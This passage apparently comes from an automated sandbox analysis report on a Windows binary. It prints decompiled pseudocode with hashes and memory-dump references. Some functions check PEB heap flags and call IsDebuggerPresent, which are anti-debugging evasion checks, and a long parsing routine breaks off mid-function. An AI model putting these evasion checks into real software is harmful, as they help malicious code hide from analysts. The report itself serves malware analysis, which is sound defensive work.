					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x40));
				} else {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0xc));
				}
				return 0 | _v16 != 0x00000002;
			}






                                                                                                                                                      0x10019e16
                                                                                                                                                      0x10019e23
                                                                                                                                                      0x10019e3a
                                                                                                                                                      0x10019e41
                                                                                                                                                      0x10019e60
                                                                                                                                                      0x10019e43
                                                                                                                                                      0x10019e4f
                                                                                                                                                      0x10019e4f
                                                                                                                                                      0x10019e6f

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                      • Opcode ID: adfc0306beaa4e93bce03fc5c6cbb84a221f21c6f70736ffbd3c40d490348e14
                                                                                                                                                      • Instruction ID: 0347c6b33af00016a7def7ac0ecf7e1c9fc6b2e2b9c69edce8547b571e002202
                                                                                                                                                      • Opcode Fuzzy Hash: adfc0306beaa4e93bce03fc5c6cbb84a221f21c6f70736ffbd3c40d490348e14
                                                                                                                                                      • Instruction Fuzzy Hash: DCF0627AE04259EFCB10CFA8C485BACBBF0FB08710F0180B9E8059B710D2389A84DF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 10019E70, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E10019E70() {
				long _v8;
				signed int _v12;
				intOrPtr _v16;

				_v16 = 0;
				_v8 = GetVersion();
				_v12 = _v8 & 0xff;
				if(_v12 != 5) {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x44));
				} else {
					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x10));
				}
				return 0 | _v16 != 0x00000000;
			}






                                                                                                                                                      0x10019e76
                                                                                                                                                      0x10019e83
                                                                                                                                                      0x10019e9a
                                                                                                                                                      0x10019ea1
                                                                                                                                                      0x10019ec0
                                                                                                                                                      0x10019ea3
                                                                                                                                                      0x10019eaf
                                                                                                                                                      0x10019eaf
                                                                                                                                                      0x10019ecf

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Version
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1889659487-0
                                                                                                                                                      • Opcode ID: dbb0e094891841cc3e86269b2493686aad3c3c7f70f8214e3147c2cdc3d54053
                                                                                                                                                      • Instruction ID: a3e08d183ecbf4fa6e5f526f8af035818782452fc61373937d715c3ea2f5b76d
                                                                                                                                                      • Opcode Fuzzy Hash: dbb0e094891841cc3e86269b2493686aad3c3c7f70f8214e3147c2cdc3d54053
                                                                                                                                                      • Instruction Fuzzy Hash: E2F0F475E44259DFC710DFA9C585BACB7F0EB04701F1184A5E8019B751D238DA84DF50
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 00403660, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00403660(void* _a4) {
				long _v4;
				void _v8;

				_v4 = 0;
				_v8 = 0;
				DeviceIoControl(_a4, 0x222040, 0, 0,  &_v8, 4,  &_v4, 0);
				return _v8;
			}





                                                                                                                                                      0x00403673
                                                                                                                                                      0x00403677
                                                                                                                                                      0x00403686
                                                                                                                                                      0x00403693

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ControlDevice
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2352790924-0
                                                                                                                                                      • Opcode ID: e47d34cfcb88b82c1dca21dbc964445ad9bde98875293983b8115f11aa7b1a8f
                                                                                                                                                      • Instruction ID: c980475e979cc7786c770ac37ded2548a09d77aca093c9e0b7000408693c8e18
                                                                                                                                                      • Opcode Fuzzy Hash: e47d34cfcb88b82c1dca21dbc964445ad9bde98875293983b8115f11aa7b1a8f
                                                                                                                                                      • Instruction Fuzzy Hash: 46E0ECB5514300BFD340DF58DD45E6B77E8EB88A01F40891DBA89D2150E230DA1CCBA6
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A010, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A010() {

				return IsDebuggerPresent();
			}



                                                                                                                                                      0x1001a01a

                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,1001A029,?,?,1001A0C0), ref: 1001A013
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: DebuggerPresent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1347740429-0
                                                                                                                                                      • Opcode ID: 612a82e7f905e4fadff19306b7dac36e1d559707925f7834b75f507085b4ae3e
                                                                                                                                                      • Instruction ID: c4092c56797faab5bd9b61a6cf6905532769cb289c64f9062f49348239aa7e77
                                                                                                                                                      • Opcode Fuzzy Hash: 612a82e7f905e4fadff19306b7dac36e1d559707925f7834b75f507085b4ae3e
                                                                                                                                                      • Instruction Fuzzy Hash: D590023104461C8B964027A5689DB55775CA5449157944051E50D415129A55642145A5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 100060F0, Relevance: .8, Instructions: 771COMMONCrypto
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 70%
                                                                                                                                                      			E100060F0() {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				signed int _t366;
				signed int _t367;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed int _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t391;
				signed int _t394;
				signed int _t398;
				signed int _t401;
				unsigned int _t403;
				signed int _t404;
				intOrPtr _t405;
				signed int _t406;
				signed int _t407;
				void* _t408;
				signed int _t409;
				signed char _t412;
				signed int _t413;
				void* _t414;
				signed char _t417;
				unsigned int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t424;
				signed int _t425;
				signed int _t446;
				intOrPtr* _t447;
				void* _t453;
				signed int* _t456;
				signed int _t459;
				signed char _t460;
				signed int _t464;
				signed int _t470;
				signed int _t473;
				intOrPtr _t480;
				intOrPtr _t481;
				signed int _t482;
				signed int _t484;
				signed char _t489;
				signed int _t493;
				signed char _t503;
				char _t504;
				signed int _t508;
				signed int _t510;
				signed int _t511;
				signed char _t533;
				intOrPtr _t534;
				signed int _t540;
				signed int _t541;
				intOrPtr _t542;
				signed char _t545;
				intOrPtr _t559;
				signed int _t565;
				signed int _t566;
				signed int _t568;
				intOrPtr* _t584;
				signed int _t585;
				signed int _t586;
				signed int _t589;
				signed int _t591;
				intOrPtr _t595;
				intOrPtr* _t599;
				intOrPtr _t606;
				void* _t607;
				void* _t608;
				void* _t609;

				_t454 =  *((intOrPtr*)(_t607 + 0xa8));
				_t606 =  *((intOrPtr*)(_t607 + 0xa8));
				_t560 =  *((intOrPtr*)(_t607 + 0xa8));
				 *((intOrPtr*)(_t607 + 0x60)) = 0;
				 *((intOrPtr*)(_t607 + 0x64)) = 0;
				 *((intOrPtr*)(_t607 + 0x68)) = 0;
				 *((intOrPtr*)(_t607 + 0x6c)) = 0;
				 *((intOrPtr*)(_t607 + 0x58)) = 0;
				 *((intOrPtr*)(_t607 + 0x5c)) = 0;
				 *((intOrPtr*)(_t607 + 0x54)) = 0;
				 *((intOrPtr*)(_t607 + 0x50)) = 0;
				_t366 = E100049A0( *((intOrPtr*)(_t607 + 0xa8)), _t607 + 0x14);
				if(_t366 != 0) {
					L159:
					return _t366;
				} else {
					_t367 =  *(_t607 + 0x14);
					if(_t367 != 2 ||  *(_t607 + 0x18) != 0) {
						L11:
						__eflags = _t367 - 3;
						if(_t367 != 3) {
							L17:
							__eflags = _t367 - 4;
							if(_t367 != 4) {
								L22:
								_t464 =  *(_t607 + 0x18);
								__eflags = _t367 | _t464;
								if((_t367 | _t464) != 0) {
									__eflags = _t367 - 5;
									if(_t367 != 5) {
										L158:
										return 0x10;
									}
									__eflags = _t464;
									if(_t464 != 0) {
										goto L158;
									}
									 *(_t607 + 0x20) = 0;
									 *((intOrPtr*)(_t607 + 0x24)) = 0;
									 *((intOrPtr*)(_t607 + 0x30)) = 0;
									 *((intOrPtr*)(_t607 + 0x4c)) = 0;
									_t366 = E10004AC0( *(_t607 + 0xb4), _t607 + 0x20);
									__eflags = _t366;
									if(_t366 != 0) {
										goto L159;
									} else {
										_t456 =  *(_t607 + 0xb4);
										 *(_t606 + 0x40) =  *(_t607 + 0x20);
										_t366 = E100049A0(_t456, _t607 + 0x14);
										__eflags = _t366;
										if(_t366 != 0) {
											goto L159;
										} else {
											while(1) {
												L29:
												__eflags =  *(_t607 + 0x14) |  *(_t607 + 0x18);
												if(( *(_t607 + 0x14) |  *(_t607 + 0x18)) == 0) {
													break;
												}
												_t366 = E100049A0(_t456, _t607 + 0x34);
												__eflags = _t366;
												if(_t366 != 0) {
													goto L159;
												} else {
													_t425 = _t456[1];
													__eflags =  *(_t607 + 0x38);
													if(__eflags > 0) {
														goto L158;
													}
													_t595 =  *((intOrPtr*)(_t607 + 0x34));
													if(__eflags >= 0) {
														__eflags = _t595 - _t425;
														if(_t595 > _t425) {
															goto L158;
														}
													}
													__eflags =  *(_t607 + 0x18);
													if( *(_t607 + 0x18) > 0) {
														L70:
														 *_t456 =  *_t456 + _t595;
														__eflags =  *_t456;
														_t456[1] = _t425 - _t595;
														goto L71;
													} else {
														_t510 =  *(_t607 + 0x14);
														__eflags = _t510 - 0x100;
														if(_t510 >= 0x100) {
															goto L70;
														} else {
															_t511 = _t510 + 0xfffffff2;
															__eflags = _t511 - 7;
															if(__eflags > 0) {
																goto L70;
															} else {
																switch( *((intOrPtr*)(_t511 * 4 +  &M10006B54))) {
																	case 0:
																		__edi =  *(__esp + 0x20);
																		__esi = __esp + 0x30;
																		__eax = __edi;
																		__ecx = __ebx;
																		__eax = E10004C00(__edi, __ebx, __esi);
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			__ecx =  *(__esp + 0x30);
																			__eax = __edi;
																			 *(__esp + 0x24) = E10004C20(__edi,  *(__esp + 0x30));
																			 *(__esp + 0x4c) = 0;
																			goto L71;
																		}
																		goto L161;
																	case 1:
																		__eax =  *(__esp + 0x24);
																		__esi = __esp + 0x4c;
																		__ecx = __ebx;
																		__eax = E10004C00( *(__esp + 0x24), __ebx, __esi);
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			goto L71;
																		}
																		goto L161;
																	case 2:
																		goto L70;
																	case 3:
																		__eflags = _t425;
																		if(_t425 == 0) {
																			goto L158;
																		}
																		_t456[1] = _t425 + 0xffffffff;
																		_t429 =  *_t456;
																		_t512 =  *_t429;
																		_t430 = _t429 + 1;
																		__eflags = _t512;
																		 *((char*)(_t607 + 0x13)) = _t512;
																		 *_t456 = _t430;
																		if(_t512 != 0) {
																			_t366 = E10004AC0( *(_t607 + 0xb4), _t607 + 0x44);
																			__eflags = _t366;
																			if(_t366 != 0) {
																				goto L159;
																			} else {
																				_t513 =  *(_t607 + 0x44);
																				__eflags = _t513 -  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0))));
																				if(_t513 >=  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0))))) {
																					goto L158;
																				}
																				_t433 =  *((intOrPtr*)(_t607 + 0xbc));
																				_t574 =  *(_t433 + _t513 * 8);
																				_t456 =  *(_t607 + 0xb4);
																				 *(_t607 + 0x1c) =  *(_t433 + 4 + _t513 * 8);
																				goto L44;
																			}
																		} else {
																			 *(_t607 + 0x1c) = _t595 + 0xffffffff;
																			_t574 = _t430;
																			L44:
																			__eflags =  *(_t607 + 0x1c) & 0x00000001;
																			if(( *(_t607 + 0x1c) & 0x00000001) != 0) {
																				goto L158;
																			}
																			_t597 =  *((intOrPtr*)(_t607 + 0xc4));
																			_push(4 +  *(_t607 + 0x20) * 4);
																			_push(_t597);
																			_t435 =  *((intOrPtr*)( *_t597))();
																			_t610 = _t607 + 8;
																			__eflags = _t435;
																			 *(_t606 + 0x74) = _t435;
																			if(_t435 == 0) {
																				L160:
																				return 2;
																			} else {
																				_t552 =  *(_t610 + 0x1c);
																				__eflags = _t552;
																				if(_t552 != 0) {
																					_push(_t552);
																					_push(_t597);
																					_t436 =  *((intOrPtr*)( *_t597))();
																					_t611 = _t610 + 8;
																					__eflags = _t436;
																					 *(_t606 + 0x78) = _t436;
																					if(_t436 == 0) {
																						goto L160;
																					} else {
																						E1000D190(_t456, _t574, _t597, _t436, _t574,  *((intOrPtr*)(_t611 + 0x1c)));
																						_t552 =  *(_t611 + 0x28);
																						_t607 = _t611 + 0xc;
																						goto L50;
																					}
																				} else {
																					_t606 = 0;
																					L50:
																					_t366 = E10005F30( *(_t607 + 0x20),  *(_t606 + 0x74),  *(_t606 + 0x78), _t552);
																					__eflags = _t366;
																					if(_t366 != 0) {
																						goto L159;
																					} else {
																						__eflags =  *((intOrPtr*)(_t607 + 0x13)) - _t366;
																						if( *((intOrPtr*)(_t607 + 0x13)) == _t366) {
																							_t439 =  *(_t607 + 0x1c);
																							_t456[1] = _t456[1] - _t439;
																							 *_t456 =  *_t456 + _t439;
																						}
																						goto L71;
																					}
																				}
																			}
																		}
																		goto L161;
																	case 4:
																		__edx =  *(__esp + 0xc4);
																		__eax =  *(__esp + 0xc0);
																		__ecx =  *( *(__esp + 0xc0));
																		_push( *(__esp + 0xc4));
																		_push(__ecx);
																		_t136 = __ebp + 0x64; // 0x64
																		__ecx = _t136;
																		goto L67;
																	case 5:
																		__edx =  *(__esp + 0xc4);
																		__eax =  *(__esp + 0xc0);
																		__ecx =  *( *(__esp + 0xc0));
																		_push( *(__esp + 0xc4));
																		_push(__ecx);
																		_t131 = __ebp + 0x5c; // 0x5c
																		__ecx = _t131;
																		L67:
																		__edx =  *(__esp + 0xc4);
																		__eax =  *(__esp + 0x28);
																		_push( *(__esp + 0xc4));
																		_push(__ebx);
																		_push(__eax);
																		_push(__ecx);
																		__eax = E10005FA0(__eflags);
																		__esp = __esp + 0x18;
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			goto L71;
																		}
																		goto L161;
																	case 6:
																		__edi =  *(__esp + 0xc4);
																		_t110 = __ebp + 0x54; // 0x54
																		__esi = _t110;
																		__eax = E100047E0(__esi, __edi);
																		__eax =  *(__esp + 0x28);
																		__ecx = __ebx;
																		__eax = E10004C60( *(__esp + 0x28), __ebx, __esi, __edi);
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			__eax =  *(__ebx + 4);
																			__eflags = __eax;
																			if(__eax == 0) {
																				goto L158;
																			}
																			 *(__ebx + 4) = __eax;
																			__eax =  *__ebx;
																			__cl =  *__eax;
																			__eax = __eax + 1;
																			__eflags = __cl;
																			 *__ebx = __eax;
																			if(__cl != 0) {
																				__eax =  *(__esp + 0xb4);
																				__ebx = __esp + 0x2c;
																				__eax = E10004AC0( *(__esp + 0xb4), __esp + 0x2c);
																				__eflags = __eax;
																				if(__eax != 0) {
																					goto L159;
																				} else {
																					__ecx =  *(__esp + 0x2c);
																					__edx =  *(__esp + 0xc0);
																					__eflags = __ecx -  *( *(__esp + 0xc0));
																					if(__ecx >=  *( *(__esp + 0xc0))) {
																						goto L158;
																					}
																					__eax =  *(__esp + 0xbc);
																					__edx =  *(__eax + __ecx * 8);
																					__eax =  *(__eax + 4 + __ecx * 8);
																					__ebx =  *(__esp + 0xb4);
																					 *(__esp + 0x40) = __eax;
																					 *(__esp + 0x3c) = __edx;
																					__eax = __esp + 0x3c;
																					goto L64;
																				}
																			} else {
																				__eax = __ebx;
																				L64:
																				__ecx =  *(__esp + 0x20);
																				_push( *(__esp + 0x20));
																				_push(__eax);
																				__eax = __edi;
																				__ecx = __esi;
																				__eax = E10004D30(__esi);
																				__esp = __esp + 8;
																				__eflags = __eax;
																				if(__eax != 0) {
																					goto L159;
																				} else {
																					L71:
																					_t427 = E100049A0(_t456, _t607 + 0x14);
																					__eflags = _t427;
																					if(_t427 == 0) {
																						goto L29;
																					} else {
																						return _t427;
																					}
																				}
																			}
																		}
																		goto L161;
																}
															}
														}
													}
												}
												goto L161;
											}
											__eflags =  *(_t607 + 0x20) -  *((intOrPtr*)(_t607 + 0x24)) -  *((intOrPtr*)(_t607 + 0x50));
											if( *(_t607 + 0x20) -  *((intOrPtr*)(_t607 + 0x24)) !=  *((intOrPtr*)(_t607 + 0x50))) {
												goto L158;
											}
											_t366 = E100049A0(_t456, _t607 + 0x14);
											__eflags = _t366;
											if(_t366 != 0) {
												goto L159;
											} else {
												while(1) {
													__eflags =  *(_t607 + 0x14) |  *(_t607 + 0x18);
													if(( *(_t607 + 0x14) |  *(_t607 + 0x18)) == 0) {
														break;
													}
													_t366 = E10004B40(_t456);
													__eflags = _t366;
													if(_t366 != 0) {
														goto L159;
													} else {
														_t424 = E100049A0(_t456, _t607 + 0x14);
														__eflags = _t424;
														if(_t424 == 0) {
															continue;
														} else {
															return _t424;
														}
													}
													goto L161;
												}
												_t584 =  *((intOrPtr*)(_t607 + 0xc4));
												 *((intOrPtr*)(_t607 + 0x4c)) = 0;
												 *((intOrPtr*)(_t607 + 0x24)) = 0;
												 *(_t607 + 0x44) = 0;
												 *((intOrPtr*)(_t607 + 0x3c)) = 0;
												 *(_t607 + 0x1c) = 0;
												 *(_t607 + 0x20) = 0;
												 *((intOrPtr*)(_t607 + 0x34)) = 0;
												 *(_t607 + 0x2c) = 0;
												 *((char*)(_t607 + 0x1b)) = 0;
												 *((char*)(_t607 + 0x1a)) = 0;
												 *((char*)(_t607 + 0x19)) = 0;
												 *(_t607 + 0x18) = 0x80;
												_t375 =  *((intOrPtr*)( *_t584))(_t584, 4 +  *(_t606 + 4) * 4);
												_t608 = _t607 + 8;
												__eflags = _t375;
												 *(_t606 + 0x6c) = _t375;
												if(_t375 == 0) {
													goto L160;
												} else {
													_t377 =  *(_t606 + 0x40);
													__eflags = _t377;
													if(_t377 != 0) {
														_t378 =  *((intOrPtr*)( *_t584))(_t584, _t377 * 4);
														_t608 = _t608 + 8;
														__eflags = _t378;
														 *(_t606 + 0x70) = _t378;
														if(_t378 == 0) {
															goto L160;
														} else {
															goto L84;
														}
													} else {
														 *(_t606 + 0x70) = 0;
														L84:
														_t380 =  *((intOrPtr*)( *_t584))(_t584, 8 +  *(_t606 + 0x40) * 8);
														_t609 = _t608 + 8;
														__eflags = _t380;
														 *(_t606 + 0x44) = _t380;
														if(_t380 == 0) {
															goto L160;
														} else {
															_t383 =  *(_t606 + 0x40) + 7 >> 3;
															__eflags = _t383;
															if(_t383 != 0) {
																_t385 =  *((intOrPtr*)( *_t584))(_t584, _t383);
																_t609 = _t609 + 8;
																__eflags = _t385;
																 *(_t606 + 0x48) = _t385;
																if(_t385 == 0) {
																	goto L160;
																} else {
																	goto L88;
																}
															} else {
																 *(_t606 + 0x48) = 0;
																L88:
																_t366 = E10004790(_t606 + 0x4c,  *(_t606 + 0x40), _t584);
																__eflags = _t366;
																if(_t366 != 0) {
																	goto L159;
																} else {
																	__eflags =  *((intOrPtr*)(_t609 + 0x6c)) - _t366;
																	if( *((intOrPtr*)(_t609 + 0x6c)) != _t366) {
																		_t421 =  *(_t609 + 0x68);
																		_t504 =  *_t421;
																		 *((intOrPtr*)(_t609 + 0x6c)) =  *((intOrPtr*)(_t609 + 0x6c)) - 1;
																		_t422 = _t421 + 1;
																		__eflags = _t504;
																		 *((char*)(_t609 + 0x13)) = _t504;
																		 *(_t609 + 0x68) = _t422;
																		if(_t504 == 0) {
																			_t508 = ( *((intOrPtr*)(_t609 + 0x54)) + 7 >> 3) + _t422;
																			__eflags = _t508;
																			 *(_t609 + 0x2c) = _t422;
																			 *(_t609 + 0x24) = _t508;
																		} else {
																			 *(_t609 + 0x24) = _t422;
																		}
																	}
																	__eflags =  *(_t609 + 0x20);
																	 *(_t609 + 0x28) = 0;
																	if( *(_t609 + 0x20) <= 0) {
																		L149:
																		__eflags =  *(_t609 + 0x3c);
																		_t386 =  *(_t606 + 0x44);
																		_t470 =  *(_t609 + 0x28);
																		 *((intOrPtr*)(_t386 + _t470 * 8)) =  *((intOrPtr*)(_t609 + 0x14));
																		 *(_t386 + 4 + _t470 * 8) =  *(_t609 + 0x18);
																		if( *(_t609 + 0x3c) != 0) {
																			goto L158;
																		}
																		_t387 =  *(_t609 + 0x1c);
																		 *( *(_t606 + 0x6c) + _t387 * 4) = _t470;
																		__eflags = _t387 -  *(_t606 + 4);
																		if(_t387 >=  *(_t606 + 4)) {
																			L156:
																			__eflags =  *(_t609 + 0x58);
																			if( *(_t609 + 0x58) != 0) {
																				__eflags =  *(_t609 + 0x5c);
																				if( *(_t609 + 0x5c) != 0) {
																					goto L158;
																				}
																			}
																			goto L23;
																		} else {
																			_t585 = _t387;
																			_t565 = _t470;
																			while(1) {
																				__eflags =  *(_t609 + 0x58);
																				if( *(_t609 + 0x58) == 0) {
																					goto L158;
																				}
																				_t366 = E10004AC0(_t609 + 0x58, _t609 + 0x34);
																				__eflags = _t366;
																				if(_t366 != 0) {
																					goto L159;
																				} else {
																					__eflags =  *(_t609 + 0x34) - _t366;
																					if( *(_t609 + 0x34) != _t366) {
																						goto L158;
																					}
																					_t585 = _t585 + 1;
																					 *( *(_t606 + 0x6c) + _t585 * 4) = _t565;
																					__eflags = _t585 -  *(_t606 + 4);
																					if(_t585 <  *(_t606 + 4)) {
																						continue;
																					} else {
																						goto L156;
																					}
																				}
																				goto L161;
																			}
																			goto L158;
																		}
																	} else {
																		do {
																			__eflags =  *(_t609 + 0x10);
																			_t586 =  *(_t609 + 0x28);
																			if( *(_t609 + 0x10) == 0) {
																				_t401 = _t586 + 0xffffffff >> 3;
																				__eflags = _t401;
																				 *((char*)(_t401 +  *(_t606 + 0x48))) =  *(_t609 + 0x12) & 0x000000ff;
																				 *((char*)(_t401 +  *((intOrPtr*)(_t606 + 0x4c)))) =  *(_t609 + 0x11) & 0x000000ff;
																				 *(_t609 + 0x12) = 0;
																				 *(_t609 + 0x11) = 0;
																				 *(_t609 + 0x10) = 0x80;
																			}
																			_t391 =  *(_t606 + 0x44);
																			_t459 =  *(_t609 + 0x30);
																			__eflags = _t459;
																			 *((intOrPtr*)(_t391 + _t586 * 8)) =  *((intOrPtr*)(_t609 + 0x14));
																			 *(_t391 + 4 + _t586 * 8) =  *(_t609 + 0x18);
																			_t533 =  *(_t606 + 0x50);
																			 *(_t533 + _t586 * 4) = 0;
																			if(_t459 == 0) {
																				L106:
																				__eflags =  *(_t609 + 0x3c);
																				if( *(_t609 + 0x3c) != 0) {
																					goto L117;
																				} else {
																					_t566 =  *(_t609 + 0x1c);
																					while(1) {
																						__eflags = _t566 -  *(_t606 + 4);
																						if(_t566 >=  *(_t606 + 4)) {
																							goto L158;
																						}
																						__eflags =  *(_t609 + 0x58);
																						_t533 =  *(_t606 + 0x6c);
																						 *(_t533 + _t566 * 4) = _t586;
																						 *(_t609 + 0x34) = 1;
																						if( *(_t609 + 0x58) == 0) {
																							L112:
																							_t413 =  *(_t609 + 0x34);
																							__eflags = _t413;
																							 *(_t609 + 0x3c) = _t413;
																							if(_t413 != 0) {
																								goto L118;
																							} else {
																								_t414 = E10005A70(_t606, _t566);
																								_t493 =  *(_t609 + 0x20);
																								_t609 = _t609 + 8;
																								 *((intOrPtr*)(_t609 + 0x14)) =  *((intOrPtr*)(_t609 + 0x14)) + _t414;
																								asm("adc ecx, edx");
																								__eflags = _t493 - _t533;
																								 *(_t609 + 0x18) = _t493;
																								if(__eflags < 0) {
																									goto L158;
																								}
																								if(__eflags <= 0) {
																									__eflags =  *((intOrPtr*)(_t609 + 0x14)) - _t414;
																									if( *((intOrPtr*)(_t609 + 0x14)) < _t414) {
																										goto L158;
																									}
																								}
																								_t566 = _t566 + 1;
																								 *(_t609 + 0x1c) = _t566;
																								continue;
																							}
																						} else {
																							_t366 = E10004AC0(_t609 + 0x58, _t609 + 0x34);
																							__eflags = _t366;
																							if(_t366 != 0) {
																								goto L159;
																							} else {
																								_t459 =  *(_t609 + 0x30);
																								goto L112;
																							}
																						}
																						goto L161;
																					}
																					goto L158;
																				}
																			} else {
																				_t417 = 0x80 >> (_t586 & 0x00000007);
																				_t533 =  *((intOrPtr*)((_t586 >> 3) + _t459));
																				__eflags = _t533 & _t417;
																				if((_t533 & _t417) == 0) {
																					goto L106;
																				} else {
																					_t568 =  *(_t609 + 0x4c);
																					__eflags = _t568;
																					if(_t568 == 0) {
																						_t226 = _t609 + 0x12;
																						 *_t226 =  *(_t609 + 0x12) |  *(_t609 + 0x10);
																						__eflags =  *_t226;
																					} else {
																						_t419 =  *(_t609 + 0x44);
																						_t533 = 0x80 >> (_t419 & 0x00000007);
																						_t503 =  *((intOrPtr*)((_t419 >> 3) + _t568));
																						__eflags = _t503 & _t533;
																						if((_t503 & _t533) == 0) {
																							_t533 =  *(_t609 + 0x10);
																							_t222 = _t609 + 0x12;
																							 *_t222 =  *(_t609 + 0x12) | _t533;
																							__eflags =  *_t222;
																						}
																						 *(_t609 + 0x44) = _t419 + 1;
																					}
																					__eflags =  *(_t609 + 0x3c);
																					if( *(_t609 + 0x3c) != 0) {
																						L117:
																						_t566 =  *(_t609 + 0x1c);
																						L118:
																						__eflags = _t459;
																						 *( *(_t606 + 0x70) + _t586 * 4) = _t566;
																						if(_t459 == 0) {
																							L121:
																							_t259 = _t609 + 0x3c;
																							 *_t259 =  *(_t609 + 0x3c) - 1;
																							__eflags =  *_t259;
																							if( *_t259 != 0) {
																								_t366 = E100049A0(_t609 + 0x60, _t609 + 0x78);
																								__eflags = _t366;
																								if(_t366 != 0) {
																									goto L159;
																								} else {
																									_t534 =  *((intOrPtr*)(_t609 + 0x78));
																									 *((intOrPtr*)(_t609 + 0x14)) =  *((intOrPtr*)(_t609 + 0x14)) + _t534;
																									_t473 =  *(_t609 + 0x18);
																									asm("adc ecx, eax");
																									__eflags = _t473 -  *((intOrPtr*)(_t609 + 0x7c));
																									 *(_t609 + 0x18) = _t473;
																									if(__eflags < 0) {
																										goto L158;
																									}
																									if(__eflags <= 0) {
																										__eflags =  *((intOrPtr*)(_t609 + 0x14)) - _t534;
																										if( *((intOrPtr*)(_t609 + 0x14)) < _t534) {
																											goto L158;
																										}
																									}
																									__eflags =  *((char*)(_t609 + 0x13));
																									if( *((char*)(_t609 + 0x13)) != 0) {
